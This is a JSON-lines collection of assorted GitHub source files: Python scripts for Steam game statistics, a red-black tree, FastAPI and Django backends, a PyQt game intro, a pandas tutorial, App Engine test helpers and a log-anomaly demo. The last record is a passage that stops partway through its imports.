+{"seq_id":"4866766274","text":"import json\n\ndef swap(lst, x, y):\n global swap1, swap2\n swap1 = x\n swap2 = y\n\n lst[x], lst[y] = lst[y], lst[x]\n\n\ndef partition(arr, start, end):\n global i\n global pivotind\n\n pivotind = end\n pivot = arr[pivotind]\n i = start - 1\n\n for j in range(start, end):\n if letterwaarde(arr[j], pivot):\n i += 1\n swap(arr, i, j)\n\n swap(arr, i + 1, end)\n return i + 1\n\n\ndef quicksort(arr, start, end):\n if len(arr) == 1:\n return\n\n if end > start:\n pivot = partition(arr, start, end)\n\n quicksort(arr, start, pivot - 1)\n quicksort(arr, pivot + 1, end)\n\n\ndef letterwaarde(woord1, woord2):\n alphabet = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\",\n \"v\", \"w\", \"x\", \"y\", \"z\", ]\n woord1 = woord1.lower()\n woord2 = woord2.lower()\n\n if len(woord1) == 0 or len(woord2) == 0:\n return True\n\n if woord1.lower() == woord2.lower():\n return True\n\n i = 0\n for letter in woord1.lower():\n if letter not in alphabet:\n continue\n\n while woord2[i] not in alphabet:\n if len(woord2[i:]) == 1:\n return False\n i += 1\n\n if alphabet.index(letter) < alphabet.index(woord2[i]):\n return True\n\n if alphabet.index(letter) == alphabet.index(woord2[i]):\n return letterwaarde(woord1[1:], woord2[1:])\n\n return False\n\n\ndef quicksortcaller(arr):\n quicksort(arr, 0, len(arr) - 1)\n\n\ndef allgameslength():\n with open(\"sortedgames.txt\", \"r\") as f:\n return len(f.readlines())\n\ndef hatedgame():\n max = [0, \"game\"]\n steam_files = open('steam.json')\n data = json.load(steam_files)\n for game in data:\n if game['negative_ratings'] > max[0]:\n max[0] = game['negative_ratings']\n max[1] = game['name']\n\n return max\n\n\ndef lovedgame():\n max = [0, \"game\"]\n steam_files = open('steam.json')\n data = json.load(steam_files)\n for game in data:\n if game['positive_ratings'] > max[0]:\n max[0] = game['positive_ratings']\n max[1] = game['name']\n\n return max\n\n\ndef mostplayedgame():\n played = [0, \"game\"]\n steam_files = open('steam.json')\n data = json.load(steam_files)\n for game in data:\n owners = game[\"owners\"].split(\"-\")\n owners = int(owners[1]) + int(owners[0]) / 2\n playtime = int(game['average_playtime'])\n if playtime * owners > played[0]:\n played[0] = int(playtime * owners)\n played[1] = game['name']\n\n return played\n\n\ndef leastplayedgame():\n played = [99999999, \"game\"]\n steam_files = open('steam.json')\n data = json.load(steam_files)\n for game in data:\n owners = game[\"owners\"].split(\"-\")\n owners = int(owners[1]) + int(owners[0]) / 2\n playtime = int(game['average_playtime'])\n if playtime * owners < played[0]:\n played[0] = int(playtime * owners)\n played[1] = game['name']\n\n return played\n\n\ndef mostexpensivegame():\n max = [0, \"game\"]\n steam_files = open('steam.json')\n data = json.load(steam_files)\n for game in data:\n if game['price'] > max[0]:\n max[0] = game['price']\n max[1] = game['name']\n\n return max","repo_name":"Project-Steam/Project-Steam","sub_path":"Project_Steam/AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"42211337030","text":"# -*- coding: utf-8 -*-\n\ndef main():\n cartas = []\n carta = input()\n \n cartas = carta.split()\n \n a = cartas[0]\n b = cartas[1]\n \n if int(a) > int(b):\n print(\"{}\".format(a))\n \n else:\n print(\"{}\".format(b))\n \nif __name__ == '__main__':\n main()","repo_name":"julianamarques/URI-Online-Judge","sub_path":"URI_1933 - (6570985) - Accepted.py","file_name":"URI_1933 - (6570985) - Accepted.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"2387059870","text":"\"\"\"\nThis is the main file for the FastAPI backend. All the services that the frontend calls to request\ndata will be defined here.\n\nI have created a few separate python modules in this folder that are imported here, mostly just to \nkeep this file clean. The only definitions here are for the main process (the `app` variable) and \nits endpoints. However, this is totally subjective and can be changed.\n\"\"\"\n\nimport numpy as np\nfrom fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\n\nimport app.src.utils as utils\nimport app.src.request_formats as requests\nimport app.src.response_formats as responses\nfrom app.src.model import WorldsWorstMovieRecommender\n\n\n# frontend is also running on localhost, but from port 3000\nFRONTEND_PORT = 3000\nFRONTEND_HOST = \"localhost\"\n\n# only localhost connections can make requests to the backend for security\nALLOWED_ORIGINS = [\n f\"http://{FRONTEND_HOST}:{FRONTEND_PORT}\",\n f\"{FRONTEND_HOST}:{FRONTEND_PORT}\"\n]\n\n\nstupid_model = WorldsWorstMovieRecommender()\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=ALLOWED_ORIGINS,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"]\n)\n\n@app.get(\"/echo/{input}\")\nasync def echo(input):\n \"\"\"\n A basic test endpoint that returns the param passed in the URL\n \"\"\"\n return {\"echo\": input}\n\n@app.post(\"/recommend\")\nasync def make_recommendation(userdata: requests.UserData) -> responses.Recommendation:\n \"\"\"\n A temporary endpoint showing how the backend might use a model to process user data, then\n return a prediction.\n\n With POST requests like this one, the request body from the frontend must include all the \n information defined in the UserData class. See the `request_formats.py` file for an idea\n of how we can define these custom request formats.\n \"\"\"\n input = utils.convert_userdata_to_model_input(userdata)\n predictions = stupid_model.predict(input)\n\n # see docstring for WorldsWorstMovieRecommender.predict for how this works\n best_recommendation_movie_id = int(np.argmax(predictions))\n\n return utils.convert_movie_id_to_recommendation(best_recommendation_movie_id)\n\n","repo_name":"StevePic95/movie-rec","sub_path":"backend/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7789723037","text":"\n\"\"\"\nA red–black tree is a specialised binary search tree data structure noted for fast storage\nand retrieval of ordered information, and a guarantee that operations will complete within a known time.\nCompared to other self-balancing binary search trees, the nodes in a red-black tree hold an extra bit called\n\"color\" representing \"red\" and \"black\" which is used when re-organising the tree to ensure that it is always approximately balanced.\n\nInsertion and deletion of an element both have logarithmic time complexity.\n\nA valid Red-Black Tree T has 5 properties:\n\n1) Every node in T is either red or black.\n2) The root node of T is black.\n3) Every NULL node is black\n4) If a node is red, both of its children are black.\n5) Every path from a root node to a NULL node has the same number of black nodes.\n\"\"\"\n\n\n\nimport sys\n\n\"\"\"\nData structure that represents a node in the tree\n\"\"\"\nclass Node():\n def __init__(self, data):\n self.data = data # holds the key\n self.parent = None #pointer to the parent\n self.left = None # pointer to left child\n self.right = None #pointer to right child\n self.color = 1 # 1 . Red, 0 . Black\n\n\n\"\"\"\nclass RedBlackTree implements the operations in Red Black Tree\n\"\"\"\nclass RedBlackTree():\n def __init__(self):\n self.TNULL = Node(0)\n self.TNULL.color = 0\n self.TNULL.left = None\n self.TNULL.right = None\n self.root = self.TNULL\n\n\n\n \"\"\"\n Search a node in the tree - O(logN)\n \"\"\"\n def __search_tree_helper(self, node, key):\n if node == TNULL or key == node.data:\n return node\n\n if key < node.data:\n return self.__search_tree_helper(node.left, key)\n return self.__search_tree_helper(node.right, key)\n\n\n \"\"\"\n Fix the RB tree modified by the delete operation\n \"\"\"\n def __fix_delete(self, x):\n while x != self.root and x.color == 0:\n if x == x.parent.left:\n s = x.parent.right\n if s.color == 1:\n # case 3.1\n s.color = 0\n x.parent.color = 1\n self.__left_rotate(x.parent)\n s = x.parent.right\n\n if s.left.color == 0 and s.right.color == 0:\n # case 3.2\n s.color = 1\n x = x.parent\n else:\n if s.right.color == 0:\n # case 3.3\n s.left.color = 0\n s.color = 1\n self.__right_rotate(s)\n s = x.parent.right\n\n # case 3.4\n s.color = x.parent.color\n x.parent.color = 0\n s.right.color = 0\n self.__left_rotate(x.parent)\n x = self.root\n else:\n s = x.parent.left\n if s.color == 1:\n # case 3.1\n s.color = 0\n x.parent.color = 1\n self.__right_rotate(x.parent)\n s = x.parent.left\n\n if s.left.color == 0 and s.right.color == 0:\n # case 3.2\n s.color = 1\n x = x.parent\n else:\n if s.left.color == 0:\n # case 3.3\n s.right.color = 0\n s.color = 1\n self.__left_rotate(s)\n s = x.parent.left\n\n # case 3.4\n s.color = x.parent.color\n x.parent.color = 0\n s.left.color = 0\n self.__right_rotate(x.parent)\n x = self.root\n x.color = 0\n\n def __rb_transplant(self, u, v):\n if u.parent == None:\n self.root = v\n elif u == u.parent.left:\n u.parent.left = v\n else:\n u.parent.right = v\n v.parent = u.parent\n\n\n \"\"\"\n Delete the node from the tree - O(logN)\n \"\"\"\n def __delete_node_helper(self, node, key):\n # find the node containing key\n z = self.TNULL\n while node != self.TNULL:\n if node.data == key:\n z = node\n\n if node.data <= key:\n node = node.right\n else:\n node = node.left\n\n if z == self.TNULL:\n print (\"Couldn't find key in the tree\")\n return\n\n y = z\n y_original_color = y.color\n if z.left == self.TNULL:\n x = z.right\n self.__rb_transplant(z, z.right)\n elif (z.right == self.TNULL):\n x = z.left\n self.__rb_transplant(z, z.left)\n else:\n y = self.minimum(z.right)\n y_original_color = y.color\n x = y.right\n if y.parent == z:\n x.parent = y\n else:\n self.__rb_transplant(y, y.right)\n y.right = z.right\n y.right.parent = y\n\n self.__rb_transplant(z, y)\n y.left = z.left\n y.left.parent = y\n y.color = z.color\n if y_original_color == 0:\n self.__fix_delete(x)\n\n \"\"\"\n Fix the RB tree modified by the insert operation - O(1)\n \"\"\"\n def __fix_insert(self, k):\n while k.parent.color == 1:\n if k.parent == k.parent.parent.right:\n u = k.parent.parent.left # uncle\n if u.color == 1:\n # case 3.1\n u.color = 0\n k.parent.color = 0\n k.parent.parent.color = 1\n k = k.parent.parent\n else:\n if k == k.parent.left:\n # case 3.2.2\n k = k.parent\n self.__right_rotate(k)\n # case 3.2.1\n k.parent.color = 0\n k.parent.parent.color = 1\n self.__left_rotate(k.parent.parent)\n else:\n u = k.parent.parent.right # uncle\n\n if u.color == 1:\n # mirror case 3.1\n u.color = 0\n k.parent.color = 0\n k.parent.parent.color = 1\n k = k.parent.parent\n else:\n if k == k.parent.right:\n # mirror case 3.2.2\n k = k.parent\n self.__left_rotate(k)\n # mirror case 3.2.1\n k.parent.color = 0\n k.parent.parent.color = 1\n self.__right_rotate(k.parent.parent)\n if k == self.root:\n break\n self.root.color = 0\n\n\n \"\"\"\n Print the Tree structure on the screen - O(N)\n \"\"\"\n def __print_helper(self, node, indent, last):\n\n if node != self.TNULL:\n sys.stdout.write(indent)\n if last:\n sys.stdout.write(\"R----\")\n indent += \" \"\n else:\n sys.stdout.write(\"L----\")\n indent += \"| \"\n\n s_color = \"RED\" if node.color == 1 else \"BLACK\"\n print (str(node.data) + \"(\" + s_color + \")\")\n self.__print_helper(node.left, indent, False)\n self.__print_helper(node.right, indent, True)\n\n\n \"\"\"\n Search the tree for the key k and return the corresponding node - O(logN)\n \"\"\"\n def searchTree(self, k):\n return self.__search_tree_helper(self.root, k)\n\n\n\n \"\"\"\n Find the node with the minimum key - O(logN)\n \"\"\"\n def minimum(self, node):\n while node.left != self.TNULL:\n node = node.left\n return node\n\n\n \"\"\"\n Find the node with the maximum key - O(logN)\n \"\"\"\n def maximum(self, node):\n while node.right != self.TNULL:\n node = node.right\n return node\n\n\n \"\"\"\n Rotate left at node x - O(1)\n \"\"\"\n def __left_rotate(self, x):\n y = x.right\n x.right = y.left\n if y.left != self.TNULL:\n y.left.parent = x\n\n y.parent = x.parent\n if x.parent == None:\n self.root = y\n elif x == x.parent.left:\n x.parent.left = y\n else:\n x.parent.right = y\n y.left = x\n x.parent = y\n\n \"\"\"\n Rotate right at node x - O(1)\n \"\"\"\n def __right_rotate(self, x):\n y = x.left\n x.left = y.right\n if y.right != self.TNULL:\n y.right.parent = x\n\n y.parent = x.parent\n if x.parent == None:\n self.root = y\n elif x == x.parent.right:\n x.parent.right = y\n else:\n x.parent.left = y\n y.right = x\n x.parent = y\n\n\n\n \"\"\"\n Insert the key to the tree in its appropriate position and fix the tree - O(logN)\n \"\"\"\n def insert(self, key):\n # Ordinary Binary Search Insertion\n node = Node(key)\n node.parent = None\n node.data = key\n node.left = self.TNULL\n node.right = self.TNULL\n node.color = 1 # new node must be red\n\n y = None\n x = self.root\n\n while x != self.TNULL:\n y = x\n if node.data < x.data:\n x = x.left\n else:\n x = x.right\n\n # y is parent of x\n node.parent = y\n if y == None:\n self.root = node\n elif node.data < y.data:\n y.left = node\n else:\n y.right = node\n\n # if new node is a root node, simply return\n if node.parent == None:\n node.color = 0\n return\n\n # if the grandparent is None, simply return\n if node.parent.parent == None:\n return\n\n # Fix the tree\n self.__fix_insert(node)\n\n \"\"\"\n Return the root of the tree - O(1)\n \"\"\"\n def get_root(self):\n return self.root\n\n \"\"\"\n Delete the node from the tree, calling helper\n \"\"\"\n def delete_node(self, key):\n self.__delete_node_helper(self.root, key)\n\n\n \"\"\"\n Print the tree structure on the screen, calling helper\n \"\"\"\n def pretty_print(self):\n self.__print_helper(self.root, \"\", True)\n\nif __name__ == \"__main__\":\n bst = RedBlackTree()\n bst.insert(8)\n bst.insert(18)\n bst.insert(5)\n bst.insert(15)\n bst.insert(17)\n bst.insert(25)\n bst.insert(40)\n bst.insert(80)\n bst.delete_node(25)\n bst.pretty_print()\n","repo_name":"LeoPag/Data-Structures","sub_path":"Red Black Tree/red_black_tree.py","file_name":"red_black_tree.py","file_ext":"py","file_size_in_byte":10595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"30954555742","text":"from django import urls\nfrom django.urls import URLPattern, path\nfrom product import views\n\n\nurlpatterns = [\n path(\"\",views.book),\n \n path('cart/add//', views.cart_add, name='cart_add'),\n path('cart/item_clear//', views.item_clear, name='item_clear'),\n path('cart/item_increment//',\n views.item_increment, name='item_increment'),\n path('cart/item_decrement//',\n views.item_decrement, name='item_decrement'),\n path('cart/cart_clear/', views.cart_clear, name='cart_clear'),\n path('cart/cart-detail/',views.cart_detail,name='cart_detail'),\n path(\"order/\",views.order),\n\n\n\n path('checkout/',views.checkout)\n \n]\n\n\n\n\n","repo_name":"Karma2021/Individual_Project","sub_path":"product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"40187765699","text":"from cs50 import get_float\n\n# Check input\nwhile True:\n change = get_float(\"Change owed: \")\n if change >= 0:\n break\n\n# Convert to cents\ncents = round(change, 2) * 100\n\n# Find components\nquarters = int(cents / 25)\ndimes = int((cents % 25) / 10)\nnickles = int(((cents % 25) % 10) / 5)\npennies = int(((cents % 25) % 10) % 5)\n\n# Print result\nprint(quarters + dimes + nickles + pennies)","repo_name":"shdev2018/ProblemSets","sub_path":"cash/cash.py","file_name":"cash.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"23942088767","text":"\"\"\"\n Pandas Part-II\n\"\"\"\n\nimport pandas as pd\n\nteams = [\n \"Rajasthan Royals\",\n \"Delhi Capitals\",\n \"Chennai Super Kings\",\n \"Mumbai Indians\",\n \"Delhi Capitals\",\n \"Kolkata Knight Riders\",\n \"Chennai Super Kings\",\n \"Deccan Chargers\",\n \"Kings XI Punjab\",\n \"Mumbai Indias\"\n]\n\nranks = [2, 3, 4, 1, 3, 4, 1, 2, 5, 4]\nyears = [2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019]\n\nipl_data_set = {\n \"teams\": teams,\n \"ranks\": ranks,\n \"years\": years\n}\n\nprint(ipl_data_set)\n# Assignment: Web-scarap the above data set :)\n\nprint()\n\ndata_set = pd.DataFrame(ipl_data_set)\nprint(data_set)\n\nprint()\n\ngrouped_data_set = data_set.groupby('ranks')\n# print(grouped_data_set)\nprint(grouped_data_set.groups)\n\nprint()\n\ngrouped_data_set = data_set.groupby(['teams', 'ranks'])\nprint(grouped_data_set.groups)\n\nprint()\n\nprint(\"****Iterating In Group****\")\nfor team_name, grp in grouped_data_set:\n print(grp)\n print(team_name)\n print(\"-------------------------------\")\n\n\nprint(\"****Fetching Single Group****\")\nprint(grouped_data_set.get_group(\"Mumbai Indias\"))\n# Please read the thread and see if we have done something wrong: https://github.com/pandas-dev/pandas/issues/8121\n","repo_name":"ishantk/GW2020P1","sub_path":"Session30.py","file_name":"Session30.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"73"} +{"seq_id":"24603236967","text":"\"\"\"\nWord alignment using awesome-align: https://github.com/neulab/awesome-align\nPrepare src-tgt to the correct format\n\"Inputs should be *tokenized* and each line is a source language sentence and its target language translation,\nseparated by (`|||`)\"\n\"\"\"\n\nimport argparse\nfrom utils import str_to_bool\nfrom read_and_analyse_df import read_output_df\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--df_root_path', type=str)\n parser.add_argument('--data_root_path', type=str, default='data')\n parser.add_argument('--src_lang', type=str, default=\"en\")\n parser.add_argument('--tgt_lang', type=str, default=\"de\")\n parser.add_argument('--replacement_strategy', type=str, default='word2vec_similarity',\n help='[word2vec_similarity|masking_language_model]. The later option is context-based.')\n parser.add_argument('--number_of_replacement', type=int, default=5,\n help='The number of replacement for 1 SRC word')\n parser.add_argument('--dataname', type=str)\n parser.add_argument('--seed', type=int, default=0)\n parser.add_argument('--beam', type=int, default=5)\n parser.add_argument('--mask_type', type=str)\n parser.add_argument('--winoMT', type=str_to_bool, default=False)\n\n args = parser.parse_args()\n print(args)\n\n if args.winoMT:\n args.mask_type = 'pronoun'\n args.number_of_replacement = 1\n\n # Output the reformatted src-trans file to be used for awesome align\n read_output_df(df_root_path=args.df_root_path, data_root_path=args.data_root_path,\n dataset=f\"{args.dataname}_{args.src_lang}2{args.tgt_lang}\",\n src_lang=args.src_lang, tgt_lang=args.tgt_lang, mask_type=args.mask_type,\n beam=args.beam, replacement_strategy=args.replacement_strategy, ignore_case=False,\n no_of_replacements=args.number_of_replacement, winoMT=args.winoMT,\n tokenize_sentences=True, reformat_for_src_tgt_alignment=True)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TuAnh23/Perturbation-basedQE","sub_path":"src_tgt_alignment.py","file_name":"src_tgt_alignment.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"28278430635","text":"\"\"\"\n Test Helper\n\"\"\"\nfrom unittest import TestCase\nfrom unittest import skip # As convenience for test modules.\nfrom os.path import abspath, dirname, join\nimport hashlib\nimport email\nfrom bs4 import BeautifulSoup\nfrom urlparse import urlparse\n\nfrom google.appengine.ext import ndb, testbed\nfrom google.appengine.api.mail import InboundEmailMessage\n\nfrom controllers import app\nimport config\n\n\n#\n# Constants\n#\n# See http://stackoverflow.com/a/9065860/1093087\nXHR_HEADERS = [('X-Requested-With', 'XMLHttpRequest')]\n\n\n#\n# Base Test Classes\n#\nclass AppEngineTestCase(TestCase):\n \"\"\"Basic test case setup. This doesn't provide any patches or optimizations.\n It can be used as a baseline for comparing other base classes below.\n \"\"\"\n def setUp(self, **options):\n app.config['TESTING'] = True\n self.longMessage = True\n self.testbed = make_bed(**options)\n\n # Optional mock csrf token: Default = True\n # WTF_CSRF_ENABLED: circumvents WTForm CSRF protection\n # ACCEPT_MOCK_CSRF_TOKEN: circumvents check_csrf filter\n if options.get('mock_csrf_token', True):\n app.config['WTF_CSRF_ENABLED'] = False\n app.config['ACCEPT_MOCK_CSRF_TOKEN'] = True\n\n def tearDown(self):\n self.testbed.deactivate()\n\n def initTaskQueueStub(self):\n self.testbed.init_taskqueue_stub(root_path=project_root())\n self.taskqueue_stub = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)\n\n def initMailStub(self):\n self.testbed.init_mail_stub()\n self.mail_stub = self.testbed.get_stub(testbed.MAIL_SERVICE_NAME)\n return self.mail_stub\n\n def initAppContext(self):\n \"\"\"For cases where an Flask context may be needed for a unit test.\n \"\"\"\n from controllers import app\n return app.app_context\n\nclass AppEngineModelTest(AppEngineTestCase):\n \"\"\"Using this class with counter patch speeds up test. See models/test_prediction.py\n for example of usage.\n \"\"\"\n def setUp(self, **options):\n self.longMessage = True\n self.testbed = make_bed(**options)\n super(AppEngineModelTest, self).setUp(**options)\n\n def tearDown(self):\n self.testbed.deactivate()\n\nclass AppEngineControllerTest(AppEngineModelTest):\n \"\"\"Similar to Model test except it inits user stub by default.\n \"\"\"\n def setUp(self, **options):\n options['init_user_stub'] = options.get('init_user_stub', True)\n options['init_taskqueue_stub'] = options.get('init_taskqueue_stub', True)\n super(AppEngineControllerTest, self).setUp(**options)\n\n\ndef make_bed(**options):\n # Initializing the datastore stub with root_path enables tests to generate\n # index.yaml file. See http://stackoverflow.com/q/24702001/1093087.\n bed = testbed.Testbed()\n bed.activate()\n bed.init_datastore_v3_stub(root_path=project_root())\n bed.init_memcache_stub()\n\n # Optional user stub setup: Default = False. Note: MockIdentityService will\n # stub this.\n if options.get('init_user_stub'):\n bed.init_user_stub()\n\n # Optional task queue setup: Default = False\n if options.get('init_taskqueue_stub', False):\n bed.init_taskqueue_stub(root_path=project_root())\n bed.taskqueue_stub = bed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)\n\n # Optional mail stub setup: Default = False\n if options.get('init_mail_stub', False):\n bed.init_mail_stub()\n bed.mail_stub = bed.get_stub(testbed.MAIL_SERVICE_NAME)\n\n # Clear cache\n ndb.get_context().clear_cache()\n\n return bed\n\n\n#\n# Helper Methods\n#\nproject_root = lambda: abspath(join(dirname(__file__), '..'))\n\ndef parse_html(markup):\n # Returns\n html = BeautifulSoup(markup, 'html.parser')\n return html\n\ndef redirect_path(response):\n if not response.location:\n return None\n else:\n return urlparse(response.location).path\n\ndef extract_id_from_url(url):\n if url is None:\n return None\n else:\n return int(re.search('\\d+', url).group())\n\n\n#\n# Helper Classes and Fixtures\n#\nclass TestEmail(object):\n @staticmethod\n def fixture(**options):\n # Default Options\n fixture_name = options.get('fixture', 'recruiter_email')\n sender = options.get('sender', 'sender@email.com')\n recipient = options.get('recipient', 'recipient@foo.appspotmail.com')\n recruiter_name = options.get('recruiter_name', 'Harold Kumar')\n recruiter_email = options.get('recruiter_email', 'harold.kumar@whitecastle.com')\n\n fname = '%s.eml' % (fixture_name)\n path = join(project_root(), 'tests/fixtures/files', fname)\n\n with open(path, 'r') as f:\n raw_message_format = f.read().strip()\n\n # Template Substitutions\n message_string = raw_message_format.replace('%SENDER%', sender)\n message_string = message_string.replace('%RECIPIENT%', recipient)\n message_string = message_string.replace('%RECRUITER_NAME%', recruiter_name)\n message_string = message_string.replace('%RECRUITER_EMAIL%', recruiter_email)\n\n mime_message = email.message_from_string(message_string)\n return InboundEmailMessage(mime_message)\n\n\nclass MockIdentityService(object):\n\n @staticmethod\n def init_app_engine_user_service(test):\n \"\"\"For tests that may not require a user but still need the service to\n be active.\n \"\"\"\n test.testbed.init_user_stub()\n\n @staticmethod\n def stub_app_engine_user(test, **options):\n \"\"\"Stubs App Engine user service.\n \"\"\"\n email = options.get('email', 'user@gmail.com')\n user_id = hashlib.md5(email).hexdigest()\n is_admin = str(int(options.get('as_admin', False)))\n\n test.testbed.setup_env(USER_EMAIL=email,\n USER_ID=user_id,\n USER_IS_ADMIN=is_admin,\n overwrite=True)\n test.testbed.init_user_stub()\n return user_id\n","repo_name":"klenwell/decruiter","sub_path":"app-engine/tests/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":5959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"70837539757","text":"import json\nimport sys\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QWidget, QToolButton, QApplication, QDesktopWidget, QLabel, QListWidget\nimport requests\n\nfrom saverank import SaveRank\nfrom main import Main\n\n\nclass Intro (QWidget):\n url = \"https://sw-adproject-ahpjy.run.goorm.io/rank/\"\n\n def __init__(self):\n super().__init__()\n\n self.setFixedSize(300, 600)\n\n self.rankList = QListWidget(self)\n self.setRank()\n\n self.startButton = QToolButton(self)\n self.startButton.setText(\"Start\")\n self.startButton.clicked.connect(self.startGame)\n self.startButton.move(130, 435)\n self.startButton.show()\n\n self.tutorialLabel = QLabel(self)\n self.tutorialLabel.setText(\"마우스 클릭 후 드래그하여 이동\\n\\nTab 키를 눌러 총알 발사\")\n self.tutorialLabel.move(10, 550)\n self.tutorialLabel.show()\n\n\n def saveShow(self, score):\n rank = SaveRank(self, score)\n rank.show()\n\n def startGame(self):\n Main(self)\n\n def setRank(self):\n self.rankList.clear()\n rankList = self.getRank()\n if rankList:\n for i, content in enumerate(rankList):\n self.rankList.insertItem(i, content[0] + \" - \" + str(content[1]))\n self.rankList.move(10, 10)\n self.rankList.show()\n\n def getRank(self):\n try:\n return self.jsonToList(requests.get(self.url + 'list').json())\n except:\n return False\n\n def saveRank(self, userName, score):\n requests.get(self.url + 'save/' + userName + \"/\" + str(score))\n try:\n return self.setRank()\n except:\n return False\n\n def jsonToList(self, content):\n ranks = []\n for obj in content.get(\"rank\"):\n ranks.append([obj.get(\"userName\"), obj.get(\"score\")])\n return ranks\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n intro = Intro()\n intro.show()\n sys.exit(app.exec_())","repo_name":"jisang0706/SW2_ADProject","sub_path":"game/intro.py","file_name":"intro.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4382851286","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('name', models.CharField(max_length=200)),\n ('desc', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Rating',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('comment', models.TextField()),\n ('overall_rating', models.DecimalField(max_digits=10, decimal_places=9)),\n ('qual_of_doc', models.DecimalField(max_digits=10, decimal_places=9)),\n ('efficacy', models.DecimalField(max_digits=10, decimal_places=9)),\n ('usability', models.DecimalField(max_digits=10, decimal_places=9)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Tool',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('name', models.CharField(max_length=100)),\n ('desc', models.TextField()),\n ('link', models.TextField()),\n ('overall_score', models.DecimalField(max_digits=10, decimal_places=9)),\n ('qual_of_doc', models.DecimalField(max_digits=10, decimal_places=9)),\n ('efficacy', models.DecimalField(max_digits=10, decimal_places=9)),\n ('usability', models.DecimalField(max_digits=10, decimal_places=9)),\n ('free', models.BooleanField(default=False)),\n ('online', models.BooleanField(default=False)),\n ('review_count', models.PositiveIntegerField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ToolCat',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('cat_id', models.ForeignKey(to='ratings.Category')),\n ('tool_id', models.ForeignKey(to='ratings.Tool')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='rating',\n name='tool_id',\n field=models.ForeignKey(to='ratings.Tool'),\n preserve_default=True,\n ),\n ]\n","repo_name":"WayneManion/feHelix","sub_path":"ratings/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"35974380680","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('../')\n\nfrom loglizer.models.RPCA import R_pca\nfrom loglizer import dataloader, preprocessing\n\n\n \nstruct_log = '../data/OpenStack/20k+4k destroy+10k undefined +4k dhcp.log_structured.csv' # The structured log file\nlabel_file = '../data/OpenStack/20k+4k destroy + 10k undefiend+4k dhcp_label.csv' # The anomaly label file\n\n\nif __name__ == '__main__':\n \n (x_train, y_train), (x_test, y_test), DataFrame = dataloader.load_OpenStack(struct_log,\n label_file=label_file,\n window='session', \n train_ratio=0.5,\n split_type='uniform')\n feature_extractor = preprocessing.FeatureExtractor()\n x_train = feature_extractor.fit_transform(x_train, term_weighting='tf-idf'\n )\n x_test = feature_extractor.transform(x_test)\n \n model = R_pca(x_train, threshold=0.8)\n L, S = model.fit2(max_iter=600, iter_print=100)\n \n print('Train validation:')\n precision, recall, f1, accuracy, y_pred = model.evaluate1(x_train, y_train)\n \n print('Test validation:')\n precision, recall, f1, accuracy, y_pred = model.evaluate2(x_test, y_test)\n \n","repo_name":"ParisaKalaki/OpenStack","sub_path":"loglizer/demo/RPCA-demo.py","file_name":"RPCA-demo.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"26194506315","text":"'''\nHelper functions for the analysis of DRH data (and preprocessing)\nVMP 2022-02-06: refactored with chatGPT and docstrings. \n'''\n\nimport numpy as np\nimport itertools \nimport pandas as pd \nimport networkx as nx \nimport matplotlib.pyplot as plt \nfrom 